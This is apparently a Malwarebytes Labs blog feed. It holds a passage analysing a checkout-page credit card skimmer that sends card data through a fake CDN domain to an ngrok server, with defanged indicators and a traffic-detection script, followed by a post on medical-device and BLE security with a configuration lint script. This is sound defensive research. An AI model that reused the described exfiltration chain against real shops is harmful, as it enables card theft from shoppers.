Once this data is collected, the skimmer will exfiltrate it to a remote location. Here, we see yet another CDN lookalike in cdn-mediafiles[.]org. However, after checking the network traffic, we noticed this is not the actual exfiltration domain, but simply an intermediary.

Connection: keep-alive
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Referer: https://www.{removed}.com/checkout/onepage/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 36

Instead, the GET request returns a Base64 encoded response. This string, which was already present in the original skimmer script, decodes to //d68344fb.ngrok[.]io/ad.php which turns out to be the actual exfiltration server.

Figure 5: Customer data being stolen and exfiltrated to ngrok server

Ngrok is software that can expose a local machine to the outside as if it was an external server. Users can create a free account and get a public URL. Crooks have abused ngrok to exfiltrate credit card data before.

To summarize, the compromised e-commerce site loads a skimmer from a domain made to look like a CDN. Data is collected when a shopper is about to make a payment and sent to a custom ngrok server after a simple redirect.

Figure 6: Traffic flow, from skimming to data exfiltration

The above view is simplified, only keeping the key elements responsible for the skimming activity. In practice, network captures will contain hundreds more sequences that will make it more difficult to isolate the actual malicious activity.
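Isolating that intermediary hop from a noisy capture comes down to a few filters: the request was made from a checkout page, it went cross-site, and its tiny response body is Base64 that decodes to yet another URL. The script below applies those filters to a list of captured requests. It is an added example, not Malwarebytes' code or the skimmer's; the capture records, their HAR-like field names, the hostnames (`shop.example`, `cdn-mediafiles.example`, the `abcd1234` ngrok subdomain) and the list of tunnelling-service suffixes are constructed assumptions.

```python
"""Sift captured checkout-page requests for the skimmer's relay hop: a cross-site
GET from the checkout page whose small Base64 response decodes to another URL.

Added example (not Malwarebytes' code). Records, hostnames and the tunnel-service
suffix list below are constructed assumptions; field names are HAR-like.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# Absolute or protocol-relative URL with nothing else around it.
URL_RE = re.compile(r"^(https?:)?//[A-Za-z0-9.-]+(/\S*)?$")
# Tunnelling/relay services that have no business in a checkout flow (assumed list).
TUNNEL_SUFFIXES = (".ngrok.io",)


def decode_if_base64(body):
    """Return the decoded text if body is valid Base64 for printable ASCII, else None."""
    try:
        raw = base64.b64decode(body.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def suspicious_hops(records):
    """Flag cross-site requests from a checkout page whose response decodes to a URL."""
    findings = []
    for r in records:
        if "checkout" not in urlparse(r.get("referer", "")).path:
            continue  # only requests issued from the checkout page matter here
        if r["request_host"] == r["site_host"]:
            continue  # first-party traffic is not the relay we are hunting
        decoded = decode_if_base64(r["response_body"]) if r["response_body"] else None
        if decoded is None or not URL_RE.match(decoded):
            continue
        target = "https:" + decoded if decoded.startswith("//") else decoded
        next_host = urlparse(target).hostname or ""
        findings.append({
            "intermediary": r["request_host"],
            "decoded_target": decoded,
            "tunnel_service": next_host.endswith(TUNNEL_SUFFIXES),
        })
    return findings


# Constructed capture: an analytics beacon, a first-party call, and the relay hop.
CAPTURE = [
    {"site_host": "shop.example", "request_host": "www.google-analytics.com",
     "referer": "https://shop.example/checkout/onepage/",
     "response_body": "GIF89a"},                       # not valid Base64, ignored
    {"site_host": "shop.example", "request_host": "shop.example",
     "referer": "https://shop.example/checkout/onepage/",
     "response_body": "Ly90dW5uZWwuZXhhbXBsZS94"},     # first-party, ignored
    {"site_host": "shop.example", "request_host": "cdn-mediafiles.example",
     "referer": "https://shop.example/checkout/onepage/",
     "response_body": base64.b64encode(b"//abcd1234.ngrok.io/ad.php").decode()},
]

if __name__ == "__main__":
    for f in suspicious_hops(CAPTURE):
        print(f)
```

A 26-character protocol-relative path encodes to 36 Base64 characters, which matches the `Content-Length: 36` seen in the capture above; small fixed-size responses like that are a useful first cut before decoding anything. The `tunnel_service` flag is only a hint: the real tell is a cross-site response that exists solely to name the next hop.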

Blocking and reporting

We caught this campaign early on, and at the time only a handful of sites had been injected with the skimmer. We reported it to the affected parties while also making sure that Malwarebytes users were protected against it.

Figure 7: Malwarebytes blocking the skimmer on the checkout page

Threat actors know they typically have a small window of opportunity before their infrastructure gets detected and possibly shut down. They can devise clever tricks to mask their activity in addition to using domains that are either fresh or belong to legitimate (but abused) owners.

While these breaches hurt the reputation of online merchants, customers also suffer the consequences of a hack. Not only do they have to go through the hassle of getting new credit cards, their identities are stolen as well, opening the door to future phishing attacks and impersonation attempts.

Indicators of Compromise

Web skimmer domain


Web skimmer scripts




Exfiltration URL


The post Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server appeared first on Malwarebytes Labs.


Biotech health care innovations meet security challenges

The level and speed of innovations taking place in the biotech industry are baffling. On the one hand, it makes us hopeful we can quickly reduce the number of illnesses and their consequences through technological advancement—saving thousands of lives. On the other, concerns about the application of Internet-connected technology leave us wondering: at what cost?

Where does the mix of technology and medicine lead us? Advancements in genetic therapy have reshaped cancer treatment as we know it. Yet, other applications, such as automating medicine intake by measuring biometrics, may introduce whole other problem sets the medical and security world haven’t solved for.

Knowing that every human body is unique and may react in another way to the same procedure, it seems prudent to draw the line at a certain amount of automation. But how do we determine where to draw the line? Is it smart to leave that decision to the big pharmaceuticals? Let’s have a look at the developments in biotech that require bigger picture thinking from the security and privacy perspectives.

Developments in the health care industry

Some of the most promising health care developments in late stages of refining or even already in use are techniques where sensors are attached to or inserted into the patient’s body. The sensors are designed to transmit data about certain bodily conditions back to healthcare personnel.

One such technology is inserted directly into patients’ medication via chip. These “smart pills” send biometric data from within the blood stream. When the patient ingests the pill, the chip will be detected by a patch on her stomach the moment it is digested. If the patch doesn’t receive the appropriate signal, it alerts the patient’s doctor.

A big step forward for the future of smart pills will be the automated and timely administering of medicine, something currently in development. These smart pills are being designed to make patients’ lives easier by embedding a tracking system in the pill that triggers the release of the drug at the right time, so you can’t forget.

Smart pills could also be programmed to release the medication when certain circumstances are met. A system similar to this already exists for diabetes. Insulin pumps for type 1 diabetics are in use that release insulin when a low blood sugar is detected, basically by mimicking the way the pancreas would behave for healthy people.

Diagnostic biotech

Existing bio-sensors are internal measurement devices that broadcast body metrics like blood pressure, pulse, oxygen saturation, blood sugar, etc. These bio-sensors and sensors measuring the presence of other substances in the blood can be used to finetune the administration of drugs. But what if anybody else can receive these transmissions?

The feasibility of multiplex biosensors for bloodstream infection diagnosis has been under investigation for a few years and is another development that could lead to transmissions concerning our health from inside our body to a “smart” device.

Pharmaceutical companies have already released digital smart pills containing computer chips. The first digital cancer pill, which was released in early 2019, contains a chip and capsules filled with capecitabine, a cancer chemotherapy that patients need to take several times a day.

Other biotech innovations

The human genome has been almost fully mapped and we are rapidly finetuning the ability to read the map. But what does this prospect bode for the future of the information that can be extracted from the DNA samples we provided for various different reasons? Will donating blood or participating in a DNA test now result in a privacy nightmare later on? Will the risk we take now grow on us as science finds out more about the information stored in our DNA?

Figure: Genetically detectable diseases

With greater understanding of our genetics comes greater capacity for their manipulation. And gene editing currently stands as one of the most exciting, and worrying, areas within the biotech industry.

Another worrying advancement is the use of artificial intelligence (AI) to make the development of new drugs faster and cheaper. AI in particular can be used to reduce the amount of trial and error needed to design a drug candidate once a promising disease target has been identified. It can also be used to investigate and find unexpected use cases for drugs that fail in clinical trials. Promising changes, for sure. But what might AI miss that the human mind would catch? And how much would morality come into play if machines are conducting all of the testing?

Remote control of artificial limbs and animals

The advancement of modern prosthetics has gone hand in hand with the surge in rapid developments in the biotech health care sector.

In a combination of robotics and neuro-engineering, scientists are working on a new robotic hand that could be a life-changing device for amputees. The goal is to read intended finger movement from the muscular activity on the amputee’s stump and transmit it to the prosthetic hand for individual finger control.

In the military field, sharks and other animals have been given brain implants that make them remotely controllable. These sharks could, for example, be used to find enemy submarines.

Communication protocols in biotech

The smart pill, produced and patented by Proteus and called Abilify MyCite, sends a simple pulse from the pill to the patch as soon as the pill gets absorbed by stomach acid. No problem there, but then the patch sends data like the time the pill was taken and the dosage to a smartphone app over Bluetooth. The data is stored in the cloud where the patient’s doctor and up to four other people chosen by the patient, can access the information. The patient can revoke their access at any time.

In 2017 the FDA stated it was planning to hire more staff with “deep understanding” of software development in relation to medical devices, and engage with entrepreneurs on new guidelines, because it expected to get more approval requests for digital pills. This was after the approval of Abilify MyCite, which is a typical symptom of legislation running after technical innovations without ever truly catching up.

In 2018, hackers demonstrated they could install malware on an implanted pacemaker after they had discovered bugs in Medtronic’s software delivery network, a platform that doesn’t communicate directly with pacemakers but rather brings updates to supporting equipment like home monitors and pacemaker programmers, which health care professionals use to tune implanted pacemakers.

Bluetooth and medical devices

Bluetooth is ideal for the short-range, continuous wireless connections that we use for streaming audio and data. The most commonly used Bluetooth protocols in medical equipment are Bluetooth Low Energy (BLE) and Bluetooth Classic.

BLE is a Bluetooth protocol that was launched in 2010. It was designed to achieve low power consumption and low latency while accommodating the widest possible interoperable range of devices. The downside is that it can behave differently depending on the smartphone platform. This is because the device advertises on a schedule and waits for a smartphone response. When the smartphone responds, a handshake (bonding) is made, facilitating a confirmed transfer of the data packet to the smartphone before closing the connection. This saves energy, but it’s also responsible for unpredictable data transfer speed.

BLE also does not require pairing between the sender and receiver, and it can send authenticated but unencrypted data. We understand the benefits of saving energy:

  • Devices can stay longer in the
    body without having to be replaced
  • Batteries can be smaller, so easier
    to insert and less obtrusive

But depending on the nature and particularly the sensitivity of the transmitted data, other considerations might come into play. Unfortunately BLE devices have also been found to be impacted by SweynTooth vulnerabilities.
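Whether a BLE link is encrypted and whether the pairing behind it was authenticated is a per-characteristic decision the device maker configures, which is where “saving energy” quietly becomes “dose events readable by anyone in range”. The following policy check, an added example that is not Proteus’, the Bluetooth SIG’s or Malwarebytes’ code, models a device’s GATT characteristics with the required Bluetooth LE Security Mode 1 level (1 = no security, 2 = encryption after unauthenticated pairing such as Just Works, 3 = encryption after authenticated legacy pairing, 4 = encryption after authenticated LE Secure Connections pairing) and reports every operation allowed below what the data’s sensitivity warrants. The characteristic lists, the sensitivity labels and the minimum-level policy are constructed assumptions; the level definitions are the standard ones.

```python
"""Lint a BLE GATT characteristic layout for data exposed below the security
level its sensitivity warrants.

Added example, not from Proteus, the Bluetooth SIG or Malwarebytes. The
characteristic layouts, sensitivity labels and POLICY thresholds are assumptions;
the level numbers are Bluetooth LE Security Mode 1 levels.
"""
from dataclasses import dataclass

MODE1_LEVELS = {
    1: "no security",
    2: "encrypted, unauthenticated pairing (e.g. Just Works)",
    3: "encrypted, authenticated legacy pairing",
    4: "encrypted, authenticated LE Secure Connections",
}

# Minimum Mode 1 level demanded per data sensitivity (assumed policy).
POLICY = {"public": 1, "personal": 3, "medical": 4}


@dataclass
class Characteristic:
    name: str
    sensitivity: str   # key into POLICY
    read_level: int    # Mode 1 level required before read / notify is served
    write_level: int   # Mode 1 level required before a write is accepted


def lint(characteristics):
    """Return one finding per operation that is reachable below the policy level."""
    findings = []
    for c in characteristics:
        need = POLICY[c.sensitivity]
        for op, have in (("read", c.read_level), ("write", c.write_level)):
            if have < need:
                findings.append(
                    f"{c.name}: {op} allowed at level {have} ({MODE1_LEVELS[have]}), "
                    f"policy requires level {need} for {c.sensitivity} data"
                )
    return findings


# Constructed "ship it fast" layout: dose events are readable with no security at all,
# and the patient identifier only needs an unauthenticated (Just Works) pairing.
WEAK = [
    Characteristic("Device Name", "public", read_level=1, write_level=4),
    Characteristic("Patient Identifier", "personal", read_level=2, write_level=2),
    Characteristic("Dose Event (time, dosage)", "medical", read_level=1, write_level=3),
]

# Constructed hardened layout: same data, but anything non-public requires an
# authenticated LE Secure Connections pairing before it is served or accepted.
HARDENED = [
    Characteristic("Device Name", "public", read_level=1, write_level=4),
    Characteristic("Patient Identifier", "personal", read_level=4, write_level=4),
    Characteristic("Dose Event (time, dosage)", "medical", read_level=4, write_level=4),
]

if __name__ == "__main__":
    for line in lint(WEAK):
        print("WEAK:", line)
    print("HARDENED findings:", len(lint(HARDENED)))
```

The weak layout yields four findings (both operations on the patient identifier, both on the dose event) and the hardened one none. The same table is worth keeping next to the device’s threat model, because a level-1 read on a notify-capable characteristic is exactly the “anybody else can receive these transmissions” case raised earlier in the post.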


Developers of medical devices who intend to use Bluetooth as the technology to connect devices with each other and with Wi-Fi should consider carefully which Bluetooth protocol is right for their system. To do this, it is important to have a clear understanding of the needs for the system and the available options.

Medical devices should be easily updatable for those circumstances where new vulnerabilities are found and patches or other important updates need to be applied.

Maybe the healthcare industry should even consider designing a new protocol similar to Bluetooth. Combining the Low Energy properties with some extra security measures might pay off in the long run.

Cloud solutions that are used to store sensitive personal and medical data deserve to be held against a high security

We recommend only giving up your DNA samples to trusted organizations and only for reasons of utmost importance like your health.

Machines are not without fault, nor as smart as we might think. Blind trust in machines when it comes to healthcare can end in a catastrophe. This is an area where personal attention does a lot more good than the fully automated application of medicine can ever do.

Stay safe, and stay healthy!

The post Biotech health care innovations meet security challenges appeared first on Malwarebytes Labs.
